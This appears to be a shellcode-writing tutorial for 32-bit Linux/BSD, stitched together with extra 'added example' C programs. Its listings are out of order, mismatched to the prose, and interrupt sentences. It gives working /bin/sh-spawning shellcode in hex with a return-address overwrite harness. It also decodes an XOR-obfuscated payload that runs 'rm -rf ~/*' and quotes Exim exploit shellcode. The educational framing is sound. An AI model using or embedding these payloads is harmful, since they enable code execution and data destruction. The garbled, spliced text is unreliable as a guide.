uname({sys="Linux", node="Knoppix", ...}) = 0
brk(0)                                  = 0x8049588
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=60420, ...}) = 0
old_mmap(NULL, 60420, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40018000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY)        = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=..., ...}) = 0
old_mmap(NULL, 1253956, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40027000
old_mmap(0x4014f000, 32768, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x127000) = 0x4014f000
old_mmap(0x40157000, 8772, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40157000
close(3)                                = 0
munmap(0x40018000, 60420)               = 0
_exit(0)                                = ?
$


Listing 9. Getting the opcodes of the new shellcode

$ nasm -f elf exit2.asm
$ objdump -d exit2.o

exit2.o:     file format elf32-i386

Disassembly of section .text:

00000000 <.text>:
   0:   31 db                   xor    %ebx,%ebx
   2:   b0 01                   mov    $0x1,%al
   4:   cd 80                   int    $0x80


Listing 10. The binary built from the previous exit.c listing and opened with gdb

$ gdb ./exit
GNU gdb 6.1-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) break main
Breakpoint 1 at 0x804836a
(gdb) run
Starting program: /ramdisk/var/tmp/exit

Breakpoint 1, 0x0804836a in main ()
(gdb) disas _exit
Dump of assembler code for function _exit:
0x400ced9c <_exit+0>:   mov    0x4(%esp),%ebx
0x400ceda0 <_exit+4>:   mov    $0xfc,%eax
0x400ceda5 <_exit+9>:   int    $0x80
0x400ceda7 <_exit+11>:  mov    $0x1,%eax
0x400cedac <_exit+16>:  int    $0x80
0x400cedae <_exit+18>:  hlt
0x400cedaf <_exit+19>:  nop
End of assembler dump.
(gdb)
exit.c
#include <stdlib.h>

int main()
{
    exit(0);
}

We only have to compile it:

$ gcc -o exit exit.c

and disassemble it with gdb (http://www.gnu.org/software/gdb/) to make sure it executes the system call and see how it works under the hood: see Listing 3.

The last instruction in main() is the call to the exit(3) function. We will now see that exit(3), in turn, calls the _exit(2) function which will finally execute the system call, including the 0x80 interrupt: see Listing 4.

Therefore, a shellcode using the libc to indirectly execute the exit(2) system call looks like:

push dword 0        ; Status
call 0x8048284      ; Call the libc exit() function (address obtained
                    ; from the above disassembly)
add esp, 4          ; Clean up the stack

The address is specific to this binary and to this libc build, which is exactly why this method is not portable.
*BSD system calls

In the *BSD family, direct system calls (i.e. through the 0x80 interrupt) are slightly different than in Linux, while there's no difference in indirect system calls (i.e. using the libc functions addresses).

The numbers of the syscalls are listed in the /usr/src/sys/kern/syscalls.master file, which also contains the prototypes of the syscall functions. Here are the first lines of the file on OpenBSD: see Listing 5.

The first column contains the system call number, the second contains the type of the system call and the third the prototype of the function. Unlike Linux, *BSD system calls don't use the fastcall convention (i.e. passing





Listing 11. Spawning a shell

$ man 2 execve
EXECVE(2)                Linux Programmer's Manual                EXECVE(2)

NAME
       execve - execute program

SYNOPSIS
       #include <unistd.h>

       int execve(const char *filename, char *const argv[], char *const envp[]);

DESCRIPTION
       execve() executes the program pointed to by filename.  filename must be
       either a binary executable, or a script starting with a line of the form
       "#! interpreter [arg]".  In the latter case, the interpreter must be a
       valid pathname for an executable which is not itself a script, which will be
       invoked as interpreter [arg] filename.

       argv is an array of argument strings passed to the new program.  envp is an
       array of strings, conventionally of the form key=value, which are passed
       as environment to the new program.  Both, argv and envp must be terminated by
       a null pointer.  The argument vector and environment can be accessed by
       the called program's main function, when it is defined as int main(int argc,
       char *argv[], char *envp[]).


Listing 12. The overall structure of the shellcode

    jmp short mycall    ; Immediately jump to the call instruction

shellcode:
    pop esi             ; Store the address of "/bin/sh" in ESI
    [...]

mycall:
    call shellcode      ; Push the address of the next byte onto the stack: the next
                        ; byte is the beginning of the string "/bin/sh"
    db "/bin/sh"
arguments in registers), but use the C calling convention instead, pushing arguments on the stack. Arguments are pushed in reverse order (from right to left), so that they are extracted in the correct order by the function. Immediately after the system call returns, the stack needs to be cleaned up by adding to the stack pointer (ESP) a number equal to the size, in bytes, of the arguments (to put it simply, you have to add the number of arguments multiplied by 4).

The role of the EAX register, instead, remains the same: it must contain the syscall number and will eventually contain the return value. Therefore, to recap, executing a system call requires four steps:

• storing the syscall number in EAX;
• pushing (in reverse order) the arguments on the stack;
• executing the 0x80 software interrupt;
• cleaning up the stack.

The previous example for Linux, now becomes on *BSD:

exit_BSD.asm
mov eax, 1          ; Syscall number
push dword 0        ; rval
push eax            ; Push one more dword (see below)
int 0x80            ; 0x80 interrupt
add esp, 8          ; Clean up the stack

As you can see, before executing the software interrupt, you need to push one extra dword on the stack (any dword will do): the kernel expects the arguments laid out as if the syscall had been reached through a libc wrapper, i.e. with a return address sitting on top of them. For an in-depth discussion on this topic, please refer to [FreeBSD] (http://www.int80h.org/bsdasm/#default-calling-convention).


Writing the shellcode

The next examples refer to Linux, but can be easily adapted to the *BSD world. So far, we have seen how to execute simple commands using system calls. To obtain our shellcode, now, we only have to get the opcodes corresponding to the assembler instructions. There are typically three methods to get the opcodes:

• writing them manually in hex (with the Intel® documentation at hand!),
• writing the assembly code and then extracting the opcodes,
• writing the C code and disassembling it.





Listing 13. Resulting assembly code

get_shell.asm
    jmp short mycall            ; Immediately jump to the call instruction

shellcode:
    pop esi                     ; Store the address of "/bin/sh" in ESI
    xor eax, eax                ; Zero out EAX
    mov byte [esi + 7], al      ; Write the null byte at the end of the string
    mov dword [esi + 8], esi    ; [ESI+8], i.e. the memory immediately after the string
                                ; "/bin/sh", will contain the array pointed to by the
                                ; second argument of execve(2); therefore we store in
                                ; [ESI+8] the address of the string...
    mov dword [esi + 12], eax   ; ...and in [ESI+12] the NULL pointer (EAX is 0)
    mov al, 0x0b                ; Store the number of the syscall (11) in EAX
    lea ebx, [esi]              ; Copy the address of the string in EBX
    lea ecx, [esi + 8]          ; Second argument to execve(2)
    lea edx, [esi + 12]         ; Third argument to execve(2) (NULL pointer)
    int 0x80                    ; Execute the system call

mycall:
    call shellcode              ; Push the address of "/bin/sh" onto the stack
    db "/bin/sh"
I don't think this is the right place to talk about ModRM and SIB bytes, memory addressing and so on. So we won't delve here into writing hand-crafted machine code; anyway, you can find all the information you want (and probably more) in [Intel] (http://developer.intel.com/design/pentium4/manuals/index_new.htm). So let's take a look now at the other two methods.


In assembler

The second method is by far the most efficient and widespread, though we will see that all methods lead to the same results. Our first step will be to use the assembly code from the previous exit.asm example to write a shellcode that, using the exit(2) syscall, will make the application exit cleanly. To get the opcodes, we will first assemble the code with nasm (http://nasm.sourceforge.net/) and then disassemble the freshly built binary with objdump: see Listing 6.

The second column contains the opcodes we need. Therefore, we can write our first shellcode and test it with a very simple C program borrowed from [Phrack] (http://www.phrack.org/show.php?p=49&a=14): see Listing 7.

Though very popular, the above lines may not be that straightforward. Anyway, they simply overwrite the return address of the main() function with the address of the shellcode, in order to execute the shellcode instructions upon exit from main(). After the first declaration, the stack will look like:

• Return address   <- Return address (pushed by the CALL instruction) to store in EIP upon exit
• Saved EBP        <- Saved EBP (to be restored upon exit from the function)
• ret              <- First local variable of the main() function

The second instruction increments the address of the ret variable by 8 bytes (2 dwords) to obtain the address of the return address, i.e. the pointer to the first instruction which will be executed upon exit from the main() function. Finally, the third instruction overwrites this address with the address of the shellcode. At this point, the program exits from the main() function, restores EBP, stores the address of the shellcode in EIP and executes it.

Note that this trick relies on the frame layout of an unprotected 32-bit build: with a stack protector, a compiler that places ret elsewhere in the frame, or a non-executable data segment, the program crashes instead of running the shellcode. On a current system you need something like gcc -m32 -fno-stack-protector -z execstack, or a harness that copies the bytes into memory mapped executable with mmap(2).

To see all this in operation, we just have to compile sc_exit.c and run it:





Listing 14. Extracting the opcodes

$ nasm -f elf get_shell.asm
$ objdump -d get_shell.o

get_shell.o:     file format elf32-i386

Disassembly of section .text:

00000000 <shellcode-0x2>:
   0:   eb 18                   jmp    1a <mycall>

00000002 <shellcode>:
   2:   5e                      pop    %esi
   3:   31 c0                   xor    %eax,%eax
   5:   88 46 07                mov    %al,0x7(%esi)
   8:   89 76 08                mov    %esi,0x8(%esi)
   b:   89 46 0c                mov    %eax,0xc(%esi)
   e:   b0 0b                   mov    $0xb,%al
  10:   8d 1e                   lea    (%esi),%ebx
  12:   8d 4e 08                lea    0x8(%esi),%ecx
  15:   8d 56 0c                lea    0xc(%esi),%edx
  18:   cd 80                   int    $0x80

0000001a <mycall>:
  1a:   e8 e3 ff ff ff          call   2 <shellcode>
  1f:   2f                      das
  20:   62 69 6e                bound  %ebp,0x6e(%ecx)
  23:   2f                      das
  24:   73 68                   jae    8e <mycall+0x74>
$


Listing 15. Inserting the opcodes in the C program

get_shell.c
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46"
                   "\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
                   "\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main()
{
    int *ret;

    ret = (int *)&ret + 2;          /* address of main()'s saved return address */
    (*ret) = (int)shellcode;        /* overwrite it with the shellcode address */
}
$ gcc -o sc_exit sc_exit.c
$ ./sc_exit
$

Let me guess: your mouth is not really wide open in amazement! Anyway, if we want to make sure it has really been our shellcode to make the program exit, we can verify it with strace (http://www.sourceforge.net/projects/strace/): see Listing 8.

On the last line, you can notice our _exit(2) system call. Unfortunately, looking at the shellcode, we can notice a little problem: it contains a lot of null bytes and, since the





Listing 16. Disassembling with ndisasm

$ echo -ne "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"\
> "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"\
> "\x2f\x73\x68\x58" | ndisasm -u -
00000000  EB17              jmp short 0x19        ; Initial jump to the CALL
00000002  5E                pop esi               ; Store the address of the string in ESI
00000003  897608            mov [esi+0x8],esi     ; Write the address of the string in ESI+8
00000006  31C0              xor eax,eax           ; Zero out EAX
00000008  884607            mov [esi+0x7],al      ; Null-terminate the string
0000000B  89460C            mov [esi+0xc],eax     ; Write the null pointer to ESI+12
0000000E  B00B              mov al,0xb            ; Number of the execve(2) syscall
00000010  89F3              mov ebx,esi           ; Store the address of the string in EBX (first argument)
00000012  8D4E08            lea ecx,[esi+0x8]     ; Second argument (pointer to the array)
00000015  31D2              xor edx,edx           ; Zero out EDX (third argument)
00000017  CD80              int 0x80              ; Execute the syscall
00000019  E8E4FFFFFF        call 0x2              ; Push the address of the string and jump to the second instruction
0000001E  2F                das                   ; "/bin/sh" decoded as (meaningless) instructions
0000001F  62696E            bound ebp,[ecx+0x6e]
00000022  2F                das
00000023  7368              jnc 0x8d
00000025  58                pop eax
$


Listing 17. The less visible shellcode

[...]
char shellcode2[] =
    "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
    "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
    "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
    "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
    "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
    "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
    "\x7b\x35";
[...]
shellcode is often written into a string buffer, those bytes will be treated as string terminators by the application and the attack will fail. There are two ways to get around this problem:

• writing instructions that don't contain null bytes (not always possible),
• writing a self-modifying shellcode (without null bytes) which will write the necessary null bytes (e.g. string terminators) at run-time.

We will now apply the first method, while we will implement the second later.

First, the first instruction (mov ebx, 0) can be replaced by the more common (for performance reasons):

xor ebx, ebx

The second instruction, instead, contained all those zeroes because we were using a 32 bit register (EAX): the immediate value 1 is encoded as the four bytes 01 00 00 00 (the least significant byte comes first because Intel® processors are little endian). Therefore, we can solve this problem simply using an 8 bit register (AL) instead of a 32 bit register:

mov al, 1

Keep in mind that mov al, 1 only sets the low byte of EAX and leaves the upper 24 bits as they were: the syscall number is right only if EAX was already zero, which the test harness happens to guarantee but a real target may not. A robust version zeroes EAX first (xor eax, eax), as the execve shellcode later in this article does.
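As an added example (this program is not part of the original article), here is a small C scanner that reports every "bad" byte in a raw shellcode, applied to the two exit(2) encodings just discussed: the bytes of Listing 7 and the rewritten xor ebx,ebx / mov al,1 version. The bad-character set {0x00, 0x0a, 0x0d} is an assumption chosen for input that is copied as a C string or read line by line; the function names are mine.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* exit(2) shellcode as first assembled (Listing 7):
 * mov ebx,0 / mov eax,1 / int 0x80 */
const unsigned char exit_v1[] = {
    0xbb, 0x00, 0x00, 0x00, 0x00,   /* mov $0x0,%ebx : imm32 -> four nulls  */
    0xb8, 0x01, 0x00, 0x00, 0x00,   /* mov $0x1,%eax : imm32 -> three nulls */
    0xcd, 0x80                      /* int $0x80                             */
};

/* Rewritten, null-free version:
 * xor ebx,ebx / mov al,1 / int 0x80 */
const unsigned char exit_v2[] = {
    0x31, 0xdb,                     /* xor %ebx,%ebx                         */
    0xb0, 0x01,                     /* mov $0x1,%al  : imm8 -> no null       */
    0xcd, 0x80                      /* int $0x80                             */
};

/* Scan sc for bytes that belong to the bad-character set.  Offsets of the
 * hits are written to pos (at most maxpos of them); the return value is
 * the total number of hits, so a caller can size pos and scan again. */
size_t find_bad_chars(const unsigned char *sc, size_t len,
                      const unsigned char *bad, size_t nbad,
                      size_t *pos, size_t maxpos)
{
    size_t hits = 0;
    for (size_t i = 0; i < len; i++) {
        if (memchr(bad, sc[i], nbad) == NULL)
            continue;
        if (pos != NULL && hits < maxpos)
            pos[hits] = i;
        hits++;
    }
    return hits;
}

/* The most common case: the shellcode travels in a C string, so only
 * 0x00 cuts it short. */
size_t count_nulls(const unsigned char *sc, size_t len)
{
    const unsigned char nul = 0x00;
    return find_bad_chars(sc, len, &nul, 1, NULL, 0);
}

void report(const char *name, const unsigned char *sc, size_t len,
            const unsigned char *bad, size_t nbad)
{
    size_t pos[64];
    size_t hits = find_bad_chars(sc, len, bad, nbad, pos, 64);

    printf("%-8s %2zu bytes, %zu bad byte(s)", name, len, hits);
    for (size_t i = 0; i < hits && i < 64; i++)
        printf("%s 0x%02zx", i == 0 ? " at" : ",", pos[i]);
    printf("\n");
}

int main(void)
{
    /* Assumed filter: NUL, LF and CR, i.e. what a strcpy()/gets()-style
     * copy or a line-oriented reader would choke on (constructed). */
    const unsigned char bad[] = { 0x00, 0x0a, 0x0d };

    report("exit_v1", exit_v1, sizeof exit_v1, bad, sizeof bad);
    report("exit_v2", exit_v2, sizeof exit_v2, bad, sizeof bad);
    return 0;
}
```

Run it before every test of a new payload: the first line lists the seven offsets that would terminate the copy, the second reports none. Replace the bad array with whatever the target's input path actually filters (a URL decoder, for instance, also rejects 0x20 and 0x3f).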





Listing 18. Disassembling the shellcode

$ echo -ne "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8[...]" | \
> ndisasm -u -
00000000  EB10              jmp short 0x12        ; Jump to the CALL
00000002  5E                pop esi               ; Retrieve the address of byte 0x17
00000003  31C9              xor ecx,ecx           ; Zero out ECX
00000005  B14B              mov cl,0x4b           ; Setup the loop counter (see instruction 0xe)
00000007  B0FF              mov al,0xff           ; Setup the XOR mask
00000009  3006              xor [esi],al          ; XOR byte 0x17 with AL
0000000B  FEC8              dec al                ; Decrease the XOR mask
0000000D  46                inc esi               ; Load the address of the next byte
0000000E  E2F9              loop 0x9              ; Keep XORing until ECX=0
00000010  EB05              jmp short 0x17        ; Jump to the first XORed instruction
00000012  E8EBFFFFFF        call 0x2              ; PUSH the address of the next byte and
                                                  ; jump to the second instruction
[...]

Listing 19. Decoding the shellcode using python

decode.py
#!/usr/bin/env python

sc = "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9" \
     "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99" \
     "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81" \
     "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb" \
     "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf" \
     "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7" \
     "\x7b\x35"

# Replay the decoder loop: byte 0x17+i is XORed with AL, which starts
# at 0xff and is decremented after each byte
print "".join([chr(ord(c) ^ (0xff - i)) for i, c in enumerate(sc[0x17:])])
Now our assembly code looks like:

exit2.asm
xor ebx, ebx    ; status = 0 (no null bytes in the encoding)
mov al, 1       ; Number of the exit(2) syscall, 8 bit immediate
int 0x80        ; Interrupt 0x80

and the shellcode becomes: see Listing 9, which, as you can see, doesn't contain any null bytes!

In C

Now let's take a look at the other technique to extract the opcodes: writing the program in C and disassembling it. Let's consider, for instance, the binary built from the previous exit.c listing and open it with gdb (http://www.gnu.org/software/gdb/): see Listing 10.

As you can see, the _exit() function actually executes two syscalls: first number 0xfc (252), exit_group(2), and then number 1, _exit(2). The exit_group(2) syscall is similar to exit(2) but has the purpose to terminate all threads in the current thread group. Anyway, only the second syscall is required by our shellcode. So let's extract the opcodes with gdb (http://www.gnu.org/software/gdb/):

(gdb) x/4bx _exit
0x400ced9c <_exit>:     0x8b    0x5c    0x24    0x04
(gdb) x/7bx _exit+11
0x400ceda7 <_exit+11>:  0xb8    0x01    0x00    0x00    0x00    0xcd    0x80
(gdb)

Once again, to make the shellcode work in real-world applications, we will need to remove all those null bytes!

Listing 20. Looking at the decoded shellcode with hexdump

$ ./decode.py | hexdump -C
00000000  e8 25 00 00 00 2f 62 69  6e 2f 73 68 00 73 68 00  |.%.../bin/sh.sh.|
00000010  2d 63 00 72 6d 20 2d 72  66 20 7e 2f 2a 20 32 3e  |-c.rm -rf ~/* 2>|
00000020  2f 64 65 76 2f 6e 75 6c  6c 00 5d 31 c0 50 8d 5d  |/dev/null.]1.P.]|
00000030  0e 53 8d 5d 0b 53 8d 5d  08 53 89 eb 89 e1 31 d2  |.S.].S.].S....1.|
00000040  b0 0b cd 80 89 c3 31 c0  40 cd 80                 |......1.@..|
0000004b

Listing 21. Disassembling the decoded shellcode

$ ./decode.py | ndisasm -u -
00000000  E825000000        call 0x2a
00000005  2F                das
00000006  62696E            bound ebp,[ecx+0x6e]
00000009  2F                das
0000000A  7368              jnc 0x74
0000000C  007368            add [ebx+0x68],dh
0000000F  002D6300726D      add [0x6d720063],ch
00000015  202D7266207E      and [0x7e206672],ch
0000001B  2F                das
0000001C  2A20              sub ah,[eax]
0000001E  323E              xor bh,[esi]
00000020  2F                das
00000021  6465762F          gs jna 0x54
00000025  6E                outsb
00000026  756C              jnz 0x94
00000028  6C                insb
00000029  005D31            add [ebp+0x31],bl
[...]

Spawning a shell

Now it's time to write a shellcode to do something a little more useful. For instance, we can write a shellcode to spawn a shell (/bin/sh) and eventually exit cleanly. The simplest way to spawn a shell is using the execve(2) syscall. Let's take a look at its usage from its man page: see Listing 11.

To recap, we need to pass it three arguments:

• a pointer to the name of the program to execute (in our case a pointer to the string /bin/sh);
• a pointer to an array of strings to pass as arguments to the program (the first argument must be argv[0], i.e. the name of the program itself). The last element of the array must be a null pointer;
• a pointer to an array of strings to pass as environment to the program. These strings are usually in the form key=value and the last element must be a null pointer.

Therefore, spawning a shell from a C program looks like:

get_shell.c
#include <unistd.h>

int main()
{
    char *args[2];

    args[0] = "/bin/sh";
    args[1] = NULL;
    execve(args[0], args, NULL);
}

In the above example we passed to execve(2):

• a pointer to the string /bin/sh;
• an array of two pointers (the first pointing to the string /bin/sh and the second null);
• a null pointer (we don't need any environment variables).

Now let's build it and see it work:

$ gcc -o get_shell get_shell.c
$ ./get_shell
sh-2.05b$ exit
$

Ok, we got our shell! Now let's see how to use this system call in assembler (since there are only three arguments, we can use registers). We immediately have to tackle two problems:

• the first is a well-known problem: we can't insert null bytes in the shellcode; but this time we can't help







Listing 22. The beginning of the shellcode could be re-written this way

E825000000                                      call 0x2a
2F62696E2F736800                                db "/bin/sh", 0
736800                                          db "sh", 0
2D6300                                          db "-c", 0
726D202D7266207E2F2A20323E2F6465762F6E756C6C00  db "rm -rf ~/* 2>/dev/null", 0

Listing 23. Examining the called function

$ ./decode.py | cut -c 43- | ndisasm -u -
00000000  5D                pop ebp               ; Retrieve the address of the string "/bin/sh"
00000001  31C0              xor eax,eax           ; Zero out EAX
00000003  50                push eax              ; Push the null pointer onto the stack
00000004  8D5D0E            lea ebx,[ebp+0xe]     ; Store the address of "rm -rf ~/* 2>/dev/null" in EBX
00000007  53                push ebx              ; and push it on the stack
00000008  8D5D0B            lea ebx,[ebp+0xb]     ; Store the address of "-c" in EBX
0000000B  53                push ebx              ; and push it on the stack
0000000C  8D5D08            lea ebx,[ebp+0x8]     ; Store the address of "sh" in EBX
0000000F  53                push ebx              ; and push it on the stack
00000010  89EB              mov ebx,ebp           ; Store the address of "/bin/sh" in EBX (first arg to execve())
00000012  89E1              mov ecx,esp           ; Store the stack pointer in ECX (ESP points to the
                                                  ; array: second arg to execve())
00000014  31D2              xor edx,edx           ; Third arg to execve()
00000016  B00B              mov al,0xb            ; Number of the execve() syscall
00000018  CD80              int 0x80              ; Execute the syscall
0000001A  89C3              mov ebx,eax           ; Only reached if execve() fails: its return value
                                                  ; (-errno) becomes the exit code
0000001C  31C0              xor eax,eax           ; Zero out EAX
0000001E  40                inc eax               ; EAX=1 (number of the exit() syscall)
0000001F  CD80              int 0x80              ; Execute the syscall
using them: for instance, the shellcode must contain the string /bin/sh and, in C, strings must be null-terminated. And we will even have to pass two null pointers among the arguments to execve(2)!

• the second problem is finding the address of the string. Absolute memory addressing makes development much longer and harder, but, above all, it makes it almost impossible to port the shellcode among different programs and distributions.

To solve the first problem, we will make our shellcode able to put the null bytes in the right places at run-time. To solve the second problem, instead, we will use relative memory addressing.

The classic method to retrieve the address of the shellcode is to begin with a CALL instruction. The first thing a CALL instruction does is, in fact, pushing the address of the next byte onto the stack (to allow the RET instruction to insert this address in EIP upon return
from the called function); then the execution jumps to the address specified by the parameter of the CALL instruction. This way we have obtained our starting point: the address of the first byte after the CALL is the last value on the stack and we can easily retrieve it with a POP instruction! Therefore, the overall structure of the shellcode will be: see Listing 12.

Let's see what it does:

• first of all, the shellcode jumps to the CALL instruction;
• the CALL pushes onto the stack the address of the string /bin/sh (not null-terminated yet); DB is a directive (not an instruction) that simply defines (i.e. reserves and initializes) a sequence of bytes;
• now the execution jumps back to the beginning of the shellcode;
• next, the address of the string is popped from the stack and stored in ESI. From now on, we will be able to refer to memory addresses with reference to the address of the string.


Now we can fill the structure of the shellcode with something useful. Let's see, step by step, what it will have to do:

• zero out EAX in order to have some null bytes available;
• terminate the string with a null byte, copying it from EAX (we will use the AL register);
• setup the array ECX will have to point to; it will be made up of the address of the string and a null pointer. We will accomplish this by writing the address of the string (stored in ESI) in the first free bytes immediately after the string, followed by the null pointer (once again we will use the zeroes in EAX);
• store the number of the syscall (0x0b) in EAX;
• store the first argument to execve(2) (i.e. the address of the string, saved in ESI) in EBX;
• store the address of the array in ECX (ESI+8);
• store the address of the null pointer in EDX (ESI+12);
• execute the interrupt 0x80.

Note that these three stores land past the end of the shellcode itself (ESI+7 through ESI+15, while the last byte of "/bin/sh" is at ESI+6): the buffer the shellcode sits in must be writable and have at least nine bytes of slack after it, otherwise the writes corrupt whatever follows or fault.

This is the resulting assembly code: see Listing 13. Now let's extract the opcodes: see Listing 14, insert them in the C program: see Listing 15, and test it:

$ gcc -o get_shell get_shell.c
$ ./get_shell
sh-2.05b$ exit
$
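As an added example (not code from the article), the following C program resolves the jmp/call/pop idiom described above statically: it follows the short JMP, decodes the CALL's rel32 displacement, checks that the CALL lands on a POP, and returns the offset of the bytes the CALL pushes, i.e. the string. It is run on the get_shell shellcode of Listing 15 and on the Exim shellcode quoted in the Shellcode analysis section that follows; the function names and the "call first" sample buffer are mine.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* get_shell shellcode, bytes copied from Listing 15 (38 bytes). */
const unsigned char get_shell_sc[] =
    "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b"
    "\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff"
    "/bin/sh";
#define GET_SHELL_LEN (sizeof get_shell_sc - 1)

/* Exim exploit shellcode from the "Trust is good..." section (38 bytes). */
const unsigned char exim_sc[] =
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
    "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff"
    "/bin/sh\x58";
#define EXIM_LEN (sizeof exim_sc - 1)

/* Target of "jmp short rel8" (EB xx) located at offset at, or -1. */
long short_jmp_target(const unsigned char *sc, size_t len, size_t at)
{
    if (at + 2 > len || sc[at] != 0xeb)
        return -1;
    return (long)(at + 2) + (int8_t)sc[at + 1];   /* relative to next instruction */
}

/* Target of "call rel32" (E8 xx xx xx xx) located at offset at, or -1. */
long call_target(const unsigned char *sc, size_t len, size_t at)
{
    if (at + 5 > len || sc[at] != 0xe8)
        return -1;
    uint32_t rel = (uint32_t)sc[at + 1] | (uint32_t)sc[at + 2] << 8 |
                   (uint32_t)sc[at + 3] << 16 | (uint32_t)sc[at + 4] << 24;
    return (long)(at + 5) + (int32_t)rel;         /* little-endian, signed */
}

/* Resolve the idiom statically.  Accepts both shapes seen in the article:
 * "jmp short L; pop reg; ...; L: call <pop>; db ..." and the shorter
 * "call L; db ...; L: pop reg; ...".  Returns the offset of the bytes the
 * CALL pushes (the string) or -1; *pop_reg receives the register number
 * encoded in the POP (esi = 6, ebp = 5). */
long jcp_string_offset(const unsigned char *sc, size_t len, int *pop_reg)
{
    long call_at = (len > 0 && sc[0] == 0xeb) ? short_jmp_target(sc, len, 0) : 0;
    if (call_at < 0)
        return -1;
    long pop_at = call_target(sc, len, (size_t)call_at);
    if (pop_at < 0 || (size_t)pop_at >= len)
        return -1;
    if ((sc[pop_at] & 0xf8) != 0x58)              /* pop r32 is 58+r */
        return -1;
    if (pop_reg)
        *pop_reg = sc[pop_at] & 7;
    long str_at = call_at + 5;                    /* the pushed return address */
    return (size_t)str_at < len ? str_at : -1;
}

/* Copy the bytes at off up to a NUL or the end of the buffer.  Shellcode
 * strings are often NOT terminated (the terminator is written at run
 * time), so the buffer length, not strlen(), must bound the copy. */
size_t copy_string_at(const unsigned char *sc, size_t len, size_t off,
                      char *out, size_t outsz)
{
    size_t n = 0;
    while (off + n < len && sc[off + n] != 0 && n + 1 < outsz) {
        out[n] = (char)sc[off + n];
        n++;
    }
    out[n] = '\0';
    return n;
}

int main(void)
{
    const unsigned char *samples[] = { get_shell_sc, exim_sc };
    const size_t lens[] = { GET_SHELL_LEN, EXIM_LEN };
    const char *names[] = { "get_shell", "exim" };

    for (int i = 0; i < 2; i++) {
        int reg = -1;
        char s[64];
        long off = jcp_string_offset(samples[i], lens[i], &reg);
        if (off < 0) {
            printf("%s: jmp/call/pop pattern not found\n", names[i]);
            continue;
        }
        copy_string_at(samples[i], lens[i], (size_t)off, s, sizeof s);
        printf("%s: CALL pushes offset 0x%lx -> \"%s\" (pop r%d)\n",
               names[i], off, s, reg);
    }
    return 0;
}
```

The same two lines of arithmetic are what a disassembler prints as "call 2 <shellcode>" in Listing 14: the displacement is relative to the end of the CALL, which is also the address the CALL pushes. For the Exim sample the copy runs past "/bin/sh" into the trailing 0x58, because nothing inside the shellcode terminates the string; that is the run-time null byte discussed above, made visible.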


Shellcode analysis

One last point that deserves attention is the importance of disassembling shellcodes, both to learn new techniques and to be sure about what they do before executing them.

Trust is good...

For instance, let's take a look at the shellcode from the exploit (http://www.securityfocus.com/bid/12268/info/), made available by Rafael San Miguel Carrasco, exploiting a local buffer overflow vulnerability of the Exim (http://www.exim.org/) MTA (releases 4.40 through 4.43).

static char shellcode[]=
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
